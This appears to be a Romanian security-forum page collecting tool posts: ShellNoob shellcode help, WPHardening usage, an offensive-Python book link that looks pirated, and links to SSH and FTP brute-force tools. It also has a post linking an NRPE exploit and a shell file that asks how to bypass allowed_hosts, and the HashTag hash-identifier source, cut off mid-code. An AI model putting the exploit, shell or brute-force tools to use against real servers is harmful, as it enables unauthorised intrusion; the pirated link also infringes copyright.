Search the Community

ShellNoob is a writing toolkit, that helps you to writting some shellcodes, converting to different formats, resolving some boring steps. Features: convert shellcode between different formats (currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty) interactive opcode-to-binary conversion (and viceversa) mode. This is useful when you cannot use specific bytes in the shellcode. resolve syscall numbers and constants (not exactly implemented yet ) portable and easily deployable (it only relies on gcc/as/objdump and python). And it just one python file! in-place development: you run ShellNoob directly on the target architecture! other options: prepend breakpoint, 32bit/64bit switch. read from stdin / write to stdout support (use “-” as filename) Download: https://github.com/reyammer/shellnoob

WPHardening fortification is a security tool for WordPress Usage $ python wphardening.py -h Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose Active verbose mode output results --update Check for WPHardening latest stable version Target: This option must be specified to modify the package WordPress. -d DIRECTORY, --dir=DIRECTORY **REQUIRED** - Working Directory. --load-conf=FILE Load file configuration. Hardening: Different tools to hardening WordPress. -c, --chmod Chmod 755 in directory and 644 in files. -r, --remove Remove files and directory. -b, --robots Create file robots.txt -f, --fingerprinting Deleted fingerprinting WordPress. -t, --timthumb Find the library TimThumb. --wp-config Wizard generated wp-config.php --delete-version Deleted version WordPress. --plugins Download Plugins Security. --proxy=PROXY Use a HTTP proxy to connect to the target url for --plugins and --wp-config. --indexes It allows you to display the contents of directories. --malware-scan Malware Scan in WordPress project. Miscellaneous: -o FILE, --output=FILE Write log report to FILE.log Examples Check a WordPress Project $ python wphardening.py -d /home/path/wordpress -v Change permissions $ python wphardening.py -d /home/path/wordpress --chmod -v Remove files that are not used $ python wphardening.py -d /home/path/wordpress --remove -v Create your robots.txt file $ python wphardening.py -d /home/path/wordpress --robots -v Remove all fingerprinting $ python wphardening.py -d /home/path/wordpress --fingerprinting -v Check a TimThumb library $ python wphardening.py -d /home/path/wordpress --timthumb -v Create Index file $ python wphardening.py -d /home/path/wordpress --indexes -v Download Plugins security $ python wphardening.py -d /home/path/wordpress --plugins Wizard generated wp-config.php $ python wphardening.py -d /home/path/wordpress --wp-config Deleted version WordPress $ python wphardening.py -d /home/path/wordpress --delete-version -v WPHardening update $ python wphardening.py --update Use all options $ python wphardening.py -d /home/user/wordpress -c -r -f -t --wp-config --delete-version --indexes --plugins -o /home/user/wphardening.log Download: https://github.com/elcodigok/wphardening

Brief contents Chapter 1: Setting Up Your Python Environment Chapter 2: The Network: Basics Chapter 3: The Network: Raw Sockets and Sniffing Chapter 4: Owning the Network with Scapy Chapter 5: Web Hackery Chapter 6: Extending Burp Proxy Chapter 7: GitHub Command and Control Chapter 8: Common Trojaning Tasks on Windows Chapter 9: Fun with Internet Explorer Chapter 10: Windows Privilege Escalation Chapter 11: Automating Offensive Forensics Index www.mediafire.com/download/r3g1pef6ccsbplc/Black.pdf

Deci am urmatorul cod : def esl(): return random.choice(list(open('plex.txt'))) def czr(): user = { "raa": esl(), "maa": randomword(5)+'-da', "taa": '0'+str(random.randint(300000000, 560000000)) } browser.find_element_by_css_selector('#da').send_keys(user['raa']) browser.find_element_by_css_selector('#da1').send_keys(user['raa']) browser.find_element_by_css_selector('#da2').send_keys(user['raa']) ciorap = "%s%s%s%s%s" % (user['raa'],'|',user["maa"],'|',user["taa"]) f = open('zc.txt', 'a') f.write(ciorap+"\n") f.close() Vreau ca dupa ce se scrie 'user['raa']' in "zc.txt" sa il stearga din "plex.txt" . Ma tot chinui s-a fac asta dar nu prea am idee cum as putea face asta. Ideei ?

In filmulet veti vedea cum functioneaza! Rata de succes foarte scazuta deoarece pluginul NRPE are un fisier de config care contine allowed_hosts = 127.0.0.1 ca default iar dupa configurare de obicei se pun doar serverele pe care le doreste administratorul! Am intrebat si pe canalul lor de IRC si mi-au confirmat ca doar cei trecuti in allowed_hosts pot da comenzi! Daca cunoaste cineva si lucreaza cu Nagios si NRPE este asteptat aici poate ne invata mai multe chestii cum putem da bypass la allowed_hosts! http://smarth.ro/public/nrpe-exploit.py http://smarth.ro//public/shell.txt

Un fel de ''SourceForge'' made in China Ce gasim pe aici: Python SSH brute force tool Python FTP brute force tool

Name: HashTag: Parse and Identify Password Hashes Version: 0.41 Date: 11/05/2013 Author: Smeege Contact: SmeegeSec@gmail.com Description: HashTag.py is a python script written to parse and identify password hashes. It has three main arguments which consist of identifying a single hash type (-sh), parsing and identifying multiple hashes from a file (-f), and traversing subdirectories to locate files which contain hashes and parse/identify them (-d). Many common hash types are supported by the CPU and GPU cracking tool Hashcat. Using an additional argument (-hc) hashcat modes will be included in the output file(s). #!/usr/bin/python """ Name: HashTag: Parse and Identify Password Hashes Version: 0.41 Date: 11/05/2013 Author: Smeege Contact: SmeegeSec@gmail.com Description: HashTag.py is a python script written to parse and identify password hashes. It has three main arguments which consist of identifying a single hash type (-sh), parsing and identifying multiple hashes from a file (-f), and traversing subdirectories to locate files which contain hashes and parse/identify them (-d). Many common hash types are supported by the CPU and GPU cracking tool Hashcat. Using an additional argument (-hc) hashcat modes will be included in the output file(s). Copyright © 2013, Smeege Sec (http://www.smeegesec.com) All rights reserved. Please see the attached LICENSE file for additional licensing information. """ import argparse import mimetypes import os import shutil import string parser = argparse.ArgumentParser(prog='HashTag.py', usage='%(prog)s {-sh hash |-f file |-d directory} [-o output_filename] [-hc] [-n]') argGroup = parser.add_mutually_exclusive_group(required=True) argGroup.add_argument("-sh", "--singleHash", type=str, help="Identify a single hash") argGroup.add_argument("-f", "--file", type=str, help="Parse a single file for hashes and identify them") argGroup.add_argument("-d", "--directory", type=str, help="Parse, identify, and categorize hashes within a directory and all subdirectories") parser.add_argument("-o", "--output", type=str, help="Filename to output full list of all identified hashes. Default is ./HashTag/HashTag_Output_File.txt") parser.add_argument("-hc", "--hashcatOutput", action='store_true', default=False, help="Output a separate file for each hash type based on hashcat modes") parser.add_argument("-n", "--notFound", action='store_true', default=False, help="--file:Include unidentifiable hashes in the output file.") args = parser.parse_args() hashDict = dict() hashcatDict = { \ 'MD5': '0', 'md5($pass.$salt)': '10', 'Joomla': '11', 'md5($salt.$pass)': '20', 'osCommerce, xt:Commerce': '21', 'm\ d5(unicode($pass).$salt)': '30', 'md5($salt.unicode($pass))': '40', 'HMAC-MD5 (key = $pass)': '50', 'HMAC-MD5 (key\ = $salt)': '60', 'SHA1': '100', 'nsldap, SHA-1(Base64), Netscape LDAP SHA': '101', 'sha1($pass.$salt)': '110', 'nsl\ daps, SSHA-1(Base64), Netscape LDAP SSHA': '111', 'Oracle 11g': '112', 'Oracle 11g, SHA-1(Oracle)': '112', 'sha1($s\ alt.$pass)': '120', 'sha1(strtolower($username).$pass), SMF >= v1.1': '121', 'OSX v10.4, v10.5, v10.6': '122', 's\ ha1(unicode($pass).$salt)': '130', 'MSSQL(2000)': '131', 'MSSQL(2005)': '132', 'sha1($salt.unicode($pass))': '140',\ 'EPiServer 6.x < v4': '141', 'HMAC-SHA1 (key = $pass)': '150', 'HMAC-SHA1 (key = $salt)': '160', 'sha1(LinkedIn)':\ '190', 'MySQL': '200', 'MySQL4.1/MySQL5': '300', 'phpass, MD5(Wordpress), MD5(phpBB3)': '400', 'md5crypt, MD5(Unix\ ), FreeBSD MD5, Cisco-IOS MD5': '500', 'SHA-1(Django)': '800', 'MD4': '900', 'md4($pass.$salt)': '910', 'NTLM': '10\ 00', 'Domain Cached Credentials, mscash': '1100', 'SHA256': '1400', 'sha256($pass.$salt)': '1410', 'sha256($salt.$p\ ass)': '1420', 'sha256(unicode($pass).$salt)': '1430', 'sha256($salt.unicode($pass))': '1440', 'EPiServer 6.x > v4'\ : '1441', 'HMAC-SHA256 (key = $pass)': '1450', 'HMAC-SHA256 (key = $salt)': '1460', 'descrypt, DES(Unix), Tradition\ al DES': '1500', 'md5apr1, MD5(APR), Apache MD5': '1600', 'SHA512': '1700', 'sha512($pass.$salt)': '1710', 'SSHA-51\ 2(Base64), LDAP {SSHA512}': '1711', 'sha512($salt.$pass)': '1720', 'OSX v10.7': '1722', 'sha512(unicode($pass).$sal\ t)': '1730', 'MSSQL(2012)': '1731', 'sha512($salt.unicode($pass))': '1740', 'HMAC-SHA512 (key = $pass)': '1750', 'H\ MAC-SHA512 (key = $salt)': '1760', 'sha512crypt, SHA512(Unix)': '1800', 'Domain Cached Credentials2, mscash2': '210\ 0', 'Cisco-PIX MD5': '2400', 'WPA/WPA2': '2500', 'Double MD5': '2600', 'md5(md5($pass))': '2600', 'vBulletin < v3.8\ .5': '2611', 'vBulletin > v3.8.5': '2711', 'IPB2+, MyBB1.2+': '2811', 'LM': '3000', 'Oracle 7-10g, DES(Oracle)': '3\ 100', 'bcrypt, Blowfish(OpenBSD)': '3200', 'MD5(Sun)': '3300', 'md5(md5(md5($pass)))': '3500', 'md5(md5($salt).$pas\ s)': '3610', 'md5($salt.md5($pass))': '3710', 'md5($pass.md5($salt))': '3720', 'WebEdition CMS': '3721', 'md5($salt\ .$pass.$salt)': '3810', 'md5(md5($pass).md5($salt))': '3910', 'md5($salt.md5($salt.$pass))': '4010', 'md5($salt.md5\ ($pass.$salt))': '4110', 'md5($username.0.$pass)': '4210', 'md5(strtoupper(md5($pass)))': '4300', 'md5(sha1($pass))\ ': '4400', 'sha1(sha1($pass))': '4500', 'sha1(sha1(sha1($pass)))': '4600', 'sha1(md5($pass))': '4700', 'MD5(Chap)':\ '4800', 'SHA-3(Keccak)': '5000', 'Half MD5': '5100', 'Password Safe SHA-256': '5200', 'IKE-PSK MD5': '5300', 'IKE-\ PSK SHA1': '5400', 'NetNTLMv1-VANILLA / NetNTLMv1+ESS': '5500', 'NetNTLMv2': '5600', 'Cisco-IOS SHA256': '5700', 'S\ amsung Android Password/PIN': '5800', 'RipeMD160': '6000', 'Whirlpool': '6100', 'TrueCrypt 5.0+ PBKDF2-HMAC-RipeMD1\ 60': '621Y', 'TrueCrypt 5.0+ PBKDF2-HMAC-SHA512': '622Y', 'TrueCrypt 5.0+ PBKDF2-HMAC-Whirlpool': '623Y', 'TrueCryp\ t 5.0+ PBKDF2-HMAC-RipeMD160 boot-mode': '624Y', 'TrueCrypt 5.0+': '62XY', 'AIX {smd5}': '6300', 'AIX {ssha256}': '\ 6400', 'AIX {ssha512}': '6500', '1Password': '6600', 'AIX {ssha1}': '6700', 'Lastpass': '6800', 'GOST R 34.11-94':\ '6900', 'Fortigate (FortiOS)': '7000', 'OSX v10.8': '7100', 'GRUB 2': '7200', 'IPMI2 RAKP HMAC-SHA1': '7300', 'sha2\ 56crypt, SHA256(Unix)': '7400'} #Check whether a string consists of only hexadecimal characters. def isHex(singleString): for c in singleString: if not c in string.hexdigits: return False return True #Check whether a string consists of hexadecimal characters or '.' or '/' def isAlphaDotSlash(singleString): for c in singleString: if not c in string.ascii_letters and not c in string.digits and not c in '.' and not c in '/': return False return True #Identifies a single hash string based on attributes such as character length, character type (hex, alphanum, etc.), and specific substring identifiers. #These conditional statements are ordered specifically to address efficiency when dealing with large inputs def identifyHash(singleHash): if len(singleHash) == 32 and isHex(singleHash): hashDict[singleHash] = ['MD5', 'NTLM', 'MD4', 'LM', 'RAdmin v2.x', 'Haval-128', 'MD2', 'RipeMD-128', 'Tiger-128', 'Snefru-128', 'MD5(HMAC)', 'MD4(HMAC)', 'Haval-128(HMAC)', 'RipeMD-128(HMAC)', 'Tiger-128(HMAC)', \ 'Snefru-128(HMAC)', 'MD2(HMAC)', 'MD5(ZipMonster)', 'MD5(HMAC(Wordpress))', 'Skein-256(128)', 'Skein-512(128)', 'md5($pass.$salt)', 'md5($pass.$salt.$pass)', 'md5($pass.md5($pass))', 'md5($salt.$pass)', 'md5($salt.$pass.$salt)', \ 'md5($salt.$pass.$username)', 'md5($salt.\'-\'.md5($pass))', 'md5($salt.md5($pass))', 'md5($salt.md5($pass).$salt)', 'md5($salt.MD5($pass).$username)', 'md5($salt.md5($pass.$salt))', 'md5($salt.md5($salt.$pass))', 'md5($salt.md5(md5($pass).$salt))', \ 'md5($username.0.$pass)', 'md5($username.LF.$pass)', 'md5($username.md5($pass).$salt)', 'md5(1.$pass.$salt)', 'md5(3 x strtoupper(md5($pass)))', 'md5(md5($pass)), Double MD5', 'md5(md5($pass).$pass)', 'md5(md5($pass).$salt), vBulletin < v3.8.5', 'md4($salt.$pass)', 'md4($pass.$salt)' \ 'md5(md5($pass).md5($pass))', 'md5(md5($pass).md5($salt))', 'md5(md5($salt).$pass)', 'md5(md5($salt).md5($pass))', 'md5(md5($username.$pass).$salt)', 'md5(md5(base64_encode($pass)))', 'md5(md5(md5($pass)))', 'md5(md5(md5(md5($pass))))', \ 'md5(md5(md5(md5(md5($pass)))))', 'md5(sha1($pass))', 'md5(sha1(base64_encode($pass)))', 'md5(sha1(md5($pass)))', 'md5(sha1(md5($pass)).sha1($pass))', 'md5(sha1(md5(sha1($pass))))', 'md5(strrev($pass))', 'md5(strrev(md5($pass)))', \ 'md5(strtoupper(md5($pass)))', 'md5(strtoupper(md5(strtoupper(md5(strtoupper(md5($pass)))))))', 'strrev(md5($pass))', 'strrev(md5(strrev(md5($pass))))', '6 x md5($pass)', '7 x md5($pass)', '8 x md5($pass)', '9 x md5($pass)', '10 x md5($pass)', '11 x md5($pass)', '12 x md5($pass)'] elif len(singleHash) > 32 and singleHash[32] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['md5($salt.$pass.$salt)', 'md5($salt.md5($pass))', 'md5($salt.md5($pass.$salt))', 'md5($salt.md5($salt.$pass))', 'md5($username.0.$pass)', 'md5(md5($pass).md5($salt))', 'md5(md5($salt).$pass)', 'HMAC-MD5 (key = $pass)', 'HMAC-MD5 (key = $salt)', 'md5($pass.md5($salt))', \ 'WebEdition CMS', 'IPB2+, MyBB1.2+', 'md5(unicode($pass).$salt)', 'Domain Cached Credentials2, mscash2', 'md5($salt.unicode($pass))', 'vBulletin > v3.8.5', 'DCC2', 'md5(md5($pass).$salt), vBulletin < v3.8.5'] elif len(singleHash) == 40: hashDict[singleHash] = ['SHA1', 'Tiger-160', 'Haval-160', 'RipeMD160', 'HAS-160', 'SHA-1(HMAC)', 'Tiger-160(HMAC)', 'Haval-160(HMAC)', 'RipeMD-160(HMAC)', 'Skein-256(160)', 'Skein-512(160)', 'sha1(LinkedIn)', 'SAPG', 'SHA-1(MaNGOS)', 'SHA-1(MaNGOS2)', \ 'sha1($salt.$pass.$salt)', 'sha1(md5($pass.$salt))', 'sha1(md5($pass).$userdate.$salt)', 'sha1($pass.$username.$salt)', 'sha1(md5($pass).$pass)', 'sha1(md5(sha1($pass)))', 'xsha1(strtolower($pass))', 'sha1($pass.$salt)', 'sha1($salt.$pass)', \ 'sha1($salt.$username.$pass.$salt)', 'sha1($salt.md5($pass))', 'sha1($salt.md5($pass).$salt)', 'sha1($salt.sha1($pass))', 'sha1($salt.sha1($salt.sha1($pass)))', 'sha1($username.$pass)', 'sha1($username.$pass.$salt)', 'sha1(md5($pass))', \ 'sha1(md5($pass).$salt)', 'sha1(md5(sha1(md5($pass))))', 'sha1(sha1($pass))', 'sha1(sha1($pass).$salt)', 'sha1(sha1($pass).substr($pass,0,3))', 'sha1(sha1($salt.$pass))', 'sha1(sha1(sha1($pass)))', 'sha1(strtolower($username).$pass)'] elif len(singleHash) > 40 and singleHash[40] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['sha1($pass.$salt)', 'HMAC-SHA1 (key = $pass)', 'HMAC-SHA1 (key = $salt)', 'sha1(unicode($pass).$salt)', 'sha1($salt.$pass)', 'sha1($salt.unicode($pass))', 'Samsung Android Password/PIN', 'sha1($salt.$pass.$salt)', 'sha1(md5($pass.$salt))', 'sha1(md5($pass).$userdate.$salt)', 'sha1($pass.$username.$salt)'] elif len(singleHash) == 64 and isHex(singleHash): hashDict[singleHash] = ['Keccak-256', 'sha256(md5($pass).$pass))', 'Skein-256', 'Skein-512(256)', 'Ventrilo', 'WPA-PSK PMK', 'GOST R 34.11-94', 'Haval-256', 'RipeMD-256', 'SHA256', 'sha256(md5($pass))', 'sha256(sha1($pass))', 'Snefru-256', 'HMAC-SHA256 (key = $salt)', 'SHA-3(Keccak)'] elif len(singleHash) > 64 and singleHash[64] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['sha256(md5($pass.$salt))', 'sha256(md5($salt.$pass))', 'SHA-256(RuneScape)', 'sha256(sha256($pass).$salt)', 'Haval-256(HMAC)', 'RipeMD-256(HMAC)', 'sha256($pass.$salt)', 'sha256($salt.$pass)', 'SHA-256(HMAC)', 'Snefru-256(HMAC)', 'HMAC-SHA256 (key = $pass)', 'sha256(unicode($pass).$salt)', 'sha256($salt.unicode($pass))'] elif singleHash.startswith('sha1$'): hashDict[singleHash] = ['SHA-1(Django)'] elif singleHash.startswith('$H$'): hashDict[singleHash] = ['phpass, MD5(Wordpress), MD5(phpBB3)'] elif singleHash.startswith('$P$'): hashDict[singleHash] = ['phpass, MD5(Wordpress), MD5(phpBB3)'] elif singleHash.startswith('$1$'): hashDict[singleHash] = ['md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5'] elif singleHash.startswith('$apr1$'): hashDict[singleHash] = ['md5apr1, MD5(APR), Apache MD5'] elif singleHash.startswith('sha256$'): hashDict[singleHash] = ['SHA-256(Django)'] elif singleHash.startswith('$SHA$'): hashDict[singleHash] = ['SHA-256(AuthMe)'] elif singleHash.startswith('sha256$'): hashDict[singleHash] = ['SHA-256(Django)'] elif singleHash.startswith('sha384$'): hashDict[singleHash] = ['SHA-384(Django)'] elif singleHash.startswith('$SHA$'): hashDict[singleHash] = ['SHA-256(AuthMe)'] elif singleHash.startswith('$2$') or singleHash.startswith('$2a$') or singleHash.startswith('$2y'): hashDict[singleHash] = ['bcrypt, Blowfish(OpenBSD)'] elif singleHash.startswith('$5$'): hashDict[singleHash] = ['sha256crypt, SHA256(Unix)'] elif singleHash.startswith('$6$'): hashDict[singleHash] = ['sha512crypt, SHA512(Unix)'] elif singleHash.startswith('$S$'): hashDict[singleHash] = ['SHA-512(Drupal)'] elif singleHash.startswith('{SHA}'): hashDict[singleHash] = ['nsldap, SHA-1(Base64), Netscape LDAP SHA'] elif singleHash.startswith('{SSHA}'): hashDict[singleHash] = ['nsldaps, SSHA-1(Base64), Netscape LDAP SSHA'] elif singleHash.startswith('{smd5}'): hashDict[singleHash] = ['AIX {smd5}'] elif singleHash.startswith('{ssha1}'): hashDict[singleHash] = ['AIX {ssha1}'] elif singleHash.startswith('$md5$'): hashDict[singleHash] = ['MD5(Sun)'] elif singleHash.startswith('$episerver$*0*'): hashDict[singleHash] = ['EPiServer 6.x < v4'] elif singleHash.startswith('$episerver$*1*'): hashDict[singleHash] = ['EPiServer 6.x > v4'] elif singleHash.startswith('{ssha256}'): hashDict[singleHash] = ['AIX {ssha256}'] elif singleHash.startswith('{SSHA512}'): hashDict[singleHash] = ['SSHA-512(Base64), LDAP {SSHA512}'] elif singleHash.startswith('{ssha512}'): hashDict[singleHash] = ['AIX {ssha512}'] elif singleHash.startswith('$ml$'): hashDict[singleHash] = ['OSX v10.8'] elif singleHash.startswith('grub'): hashDict[singleHash] = ['GRUB 2'] elif singleHash.startswith('sha256$'): hashDict[singleHash] = ['SHA-256(Django)'] elif singleHash.startswith('sha384$'): hashDict[singleHash] = ['SHA-384(Django)'] elif singleHash.startswith('0x'): if len(singleHash) == 34: hashDict[singleHash] = ['Lineage II C4'] elif len(singleHash) < 60: hashDict[singleHash] = ['MSSQL(2005)'] elif len(singleHash) < 100: hashDict[singleHash] = ['MSSQL(2000)'] else: hashDict[singleHash] = ['MSSQL(2012)'] elif singleHash.startswith('S:'): hashDict[singleHash] = ['Oracle 11g'] elif len(singleHash) > 41 and singleHash.count(':') == 1 and singleHash[-41] == ':' and isHex(singleHash[-40:]): hashDict[singleHash] = ['sha1(strtolower($username).$pass), SMF >= v1.1'] elif singleHash.count(':') > 1: if singleHash.count(':') == 5: hashDict[singleHash] = ['NetNTLMv2', 'NetNTLMv1-VANILLA / NetNTLMv1+ESS'] elif singleHash.count(':') == 2 and '@' not in singleHash: hashDict[singleHash] = ['MD5(Chap)'] elif singleHash.count(':') == 3 or singleHash.count(':') == 6: hashDict[singleHash] = ['Domain Cached Credentials, mscash'] try: hashDict[singleHash.split(':')[3]] = 'NTLM' if not singleHash.split(':')[2] == 'aad3b435b51404eeaad3b435b51404ee' and not singleHash.split(':')[2] == 'aad3b435b51404eeaad3b435b51404ee'.upper(): hashDict[singleHash.split(':')[2]] = 'LM' except Exception as e: pass elif singleHash.count(':') == 2 and '@' in singleHash: hashDict[singleHash] = ['Lastpass'] elif len(singleHash) == 4: hashDict[singleHash] = ['CRC-16', 'CRC-16-CCITT', 'FCS-16'] elif len(singleHash) == 8: hashDict[singleHash] = ['CRC-32', 'CRC-32B', 'FCS-32', 'ELF-32', 'Fletcher-32', 'FNV-32', 'Adler-32', 'GHash-32-3', 'GHash-32-5'] elif len(singleHash) == 13: if singleHash.startswith('+'): hashDict[singleHash] = ['Blowfish(Eggdrop)'] else: hashDict[singleHash] = ['descrypt, DES(Unix), Traditional DES'] elif len(singleHash) == 16: if isHex(singleHash): hashDict[singleHash] = ['MySQL, MySQL323', 'Oracle 7-10g, DES(Oracle)', 'CRC-64', 'SAPB', 'substr(md5($pass),0,16)', 'substr(md5($pass),16,16)', 'substr(md5($pass),8,16)'] else: hashDict[singleHash] = ['Cisco-PIX MD5'] elif len(singleHash) > 16 and singleHash[-17] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['DES(Oracle)', 'Oracle 10g'] elif len(singleHash) == 20: hashDict[singleHash] = ['substr(md5($pass),12,20)'] elif len(singleHash) == 24 and isHex(singleHash): hashDict[singleHash] = ['CRC-96(ZIP)'] elif len(singleHash) == 35: hashDict[singleHash] = ['osCommerce, xt:Commerce'] elif len(singleHash) > 40 and singleHash[40] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['sha1($salt.$pass.$salt)', 'sha1(md5($pass.$salt))'] elif len(singleHash) > 40 and singleHash.count('-') == 2 and singleHash.count(':') == 2: hashDict[singleHash] = ['sha1(md5($pass).$userdate.$salt)'] elif len(singleHash) > 40 and singleHash.count(':') == 2 and len(singleHash.split(':')[1]) == 40 : hashDict[singleHash] = ['sha1($pass.$username.$salt)'] elif len(singleHash) == 41 and singleHash.startswith('*') and isHex(singleHash[1:40]): hashDict[singleHash] = ['MySQL4.1/MySQL5'] elif len(singleHash) == 43: hashDict[singleHash] = ['Cisco-IOS SHA256'] elif len(singleHash) == 47: hashDict[singleHash] = ['Fortigate (FortiOS)'] elif len(singleHash) == 48 and isHex(singleHash): hashDict[singleHash] = ['Oracle 11g, SHA-1(Oracle)', 'Haval-192', 'Haval-192(HMAC)' 'Tiger-192', 'Tiger-192(HMAC)', 'OSX v10.4, v10.5, v10.6'] elif len(singleHash) == 51 and isHex(singleHash): hashDict[singleHash] = ['MD5(Palshop)', 'Palshop'] elif len(singleHash) == 56 and isHex(singleHash): hashDict[singleHash] = ['SHA-224', 'Haval-224', 'SHA-224(HMAC)', 'Haval-224(HMAC)', 'Keccak-224', 'Skein-256(224)', 'Skein-512(224)'] elif len(singleHash) == 65: hashDict[singleHash] = ['Joomla'] elif len(singleHash) > 64 and singleHash[64] == ':': hashDict[singleHash] = ['SHA-256(PasswordSafe)', 'sha256(md5($salt.$pass))', 'sha256(md5($pass.$salt))', 'SHA-256(HMAC)', 'SHA-256(RuneScape)', 'sha256($salt.$pass)', 'sha256($pass.$salt)', 'Haval-256(HMAC)', 'RipeMD-256(HMAC)', 'Snefru-256(HMAC)', 'sha256(sha256($pass).$salt)'] elif len(singleHash) == 80 and isHex(singleHash): hashDict[singleHash] = ['RipeMD-320', 'RipeMD-320(HMAC)'] elif len(singleHash) == 96 and isHex(singleHash): hashDict[singleHash] = ['SHA-384', 'Keccak-384', 'SHA-384(HMAC)', 'sha384($salt.$pass)', 'sha384($pass.$salt)', 'Skein-512(384)', 'Skein-1024(384)'] elif len(singleHash) == 128 and isHex(singleHash): hashDict[singleHash] = ['Keccak-512', 'Skein-1024(512)', 'Skein-512', 'SHA512', 'sha512($pass.$salt)', 'sha512($salt.$pass)', 'SHA-512(HMAC)', 'Whirlpool', 'Whirlpool(HMAC)', 'sha512(unicode($pass).$salt)', 'sha512($salt.unicode($pass))', 'HMAC-SHA512 (key = $pass)'] elif len(singleHash) > 128 and singleHash[128] == ':': hashDict[singleHash] = ['HMAC-SHA512 (key = $salt)'] elif len(singleHash) == 130 and isHex(singleHash): hashDict[singleHash] = ['IPMI2 RAKP HMAC-SHA1'] elif len(singleHash) == 136 and isHex(singleHash): hashDict[singleHash] = ['OSX v10.7'] elif len(singleHash) == 177: hashDict[singleHash] = ['Whirlpool(Double)'] elif len(singleHash) == 256 and isHex(singleHash): hashDict[singleHash] = ['Skein-1024'] else: hashDict[singleHash] = [] if args.singleHash: """ Single Hash Identification: HashTag.py -sh hash Prints to screen all possible hash types and their corresponding hashcat mode if one exists. Note: When identifying a single hash on *nix operating systems remember to use single quotes to prevent interpolation. (e.g. python HashTag.py -sh '$1$abc$12345') """ identifyHash(args.singleHash) if len(hashDict[args.singleHash]): print '\nHash: {0}\n'.format(args.singleHash) for value in hashDict[args.singleHash]: hcFound = False for k, v in hashcatDict.iteritems(): if value == k: print '[*] {0} - Hashcat Mode {1}'.format(value, v) hcFound = True break if hcFound == False: print '[*] {0}'.format(value) else: print '\nHash not found: {0}'.format(args.singleHash) elif args.file: """ File Parsing and Hash Identification: HashTag.py -f file.txt [-o output_filename] [-hc] [-n] Parses a single file for possible password hashes and attempts to identify each one. Outputs to one or multiple files depending on -hc argument. """ inputFile = args.file hashCount = 0 foundModes = list() while not os.path.isfile(inputFile): inputFile = raw_input("\nFile \'{0}\' not Found!\n\nHash File Path: ".format(str(inputFile))) openInputFile = open(inputFile, 'r') if not os.path.exists('HashTag'): os.mkdir('HashTag') if args.output: while os.path.isfile(args.output) or os.path.isfile(args.output + '.txt'): args.output = raw_input("\nOutput file already exists!\n\nOutput Filename: ") outputFile = open(args.output, 'w') else: outputFile = open(os.path.join('HashTag', 'HashTag_Output_File.txt'), 'w') for line in openInputFile.readlines(): identifyHash(line.strip()) if hashDict: for k, v in hashDict.iteritems(): for mode, num in hashcatDict.iteritems(): if mode in v: hashcatMode = num foundModes.append(num) else: hashcatMode = '' if v: hashCount += 1 foundModes.sort(key=int) outputFile.write('Hash: {0}\nChar Length: {1}\nHashcat Modes: {2}\nHash Types: {3}\n\n'.format(k, len(k), foundModes, v)) if args.hashcatOutput and foundModes: for mode in foundModes: with open(os.path.join('HashTag', mode), "a") as outputTypeFile: outputTypeFile.write(k + '\n') outputTypeFile.close() foundModes = [] elif k and args.notFound: outputFile.write('Hash: {0}\nChar Length: {1}\nHashcat Modes: {2}\nHash Types: {3}\n\n'.format(k, len(k), hashcatMode, 'NONE FOUND')) print '\nFile Mimetype: {0}\nHashes Found: {1}\nFile successfully written: {2}'.format(mimetypes.guess_type(inputFile)[0], hashCount, outputFile.name) openInputFile.close() outputFile.close() else: print '\nNo hashes parsed from file {0}'.format(inputFile) elif args.directory: """ File Parsing and Hash Identification while traversing directories and subdirectories: HashTag.py -d test_dir/hash_files/ [-o output_filename] [-hc] Traverses user specified directory and all subdirectories. Identifies each file based on type or extension and attempts to parse each file for possible password hashes. Potential password protected files are separated by filetype and copied using the shutil module to new folders. Outputs to one or multiple files depending on -hc argument. """ inputDir = args.directory while not os.path.isdir(inputDir): inputDir = raw_input("\nDirectory \'{0}\' not Found!\n\nHash Files Directory: ".format(str(inputDir))) if not os.path.exists('HashTag'): os.mkdir('HashTag') if args.output: while os.path.isfile(args.output) or os.path.isfile(args.output + '.txt'): args.output = raw_input("\nOutput file already exists!\n\nOutput Filename: ") outputFile = open(args.output, 'w') else: outputFile = open(os.path.join('HashTag', 'HashTag_Hash_File.txt'), 'w') validFiles = list() validHashes = list() invalidFiles = list() nonTextFiles = ['.1password', '.7z', '.bdb', '.dd', '.hccap', '.ikemd5', '.ikesha1', '.kdbx', '.odt', '.pdf', '.plist', '.psafe', '.sig', '.sign', '.tc', '.torrent', '.zip', '.xz'] nonTextFileCount = 0 for root, dirnames, filenames in os.walk(inputDir): for filename in filenames: if mimetypes.guess_type(filename)[0] == 'text/plain' or '.hash' in filename: foundHashFile = (os.path.join(root, filename)) validFiles.append(foundHashFile) elif any(nonTextFile in filename for nonTextFile in nonTextFiles): for nonTextFile in nonTextFiles: if nonTextFile in filename: newDir = os.path.join('HashTag', nonTextFile.replace('.', '')) if not os.path.exists(newDir): os.makedirs(newDir) shutil.copy2(os.path.join(root, filename), os.path.join(newDir, filename)) else: invalidFiles.append((os.path.join(root, filename))) if validFiles: for hashFile in validFiles: openHashFile = open(hashFile) hashLines = [line.strip() for line in openHashFile] for singleHash in hashLines: if len(line) > 3 and len(line) <= 300: validHashes.append(singleHash) openHashFile.close() else: print 'No valid file formats found.' if validHashes: for singleHash in validHashes: identifyHash(singleHash) #Write all parsed hashes to output file. Comment out for less overhead. outputFile.write(singleHash + '\n') outputFile.close() validHashCount = len(validHashes) validFileCount = len(validFiles) + nonTextFileCount invalidFileCount = len(invalidFiles) print '\nTotal Hashes Found: {0}'.format(validHashCount) print 'Valid file types: {0}'.format(validFileCount) print 'Invalid file types: {0}'.format(invalidFileCount) openInvalidFiles = open(os.path.join('HashTag','HashTag_Invalid_Files' + '.txt'), 'w') for invalidFile in invalidFiles: openInvalidFiles.write(invalidFile + '\n') print '\nNow identifying {0} hashes from {1} files...'.format(validHashCount, validFileCount) notifyCount = 0 tenPercentCount = (validHashCount / 10) if args.hashcatOutput: for key, valueList in hashDict.iteritems(): if valueList: for value in valueList: if value in hashcatDict.iterkeys(): with open(os.path.join('HashTag',value) + '_{0}.txt'.format(hashcatDict[value]), "a") as f: f.write(key + '\n') else: with 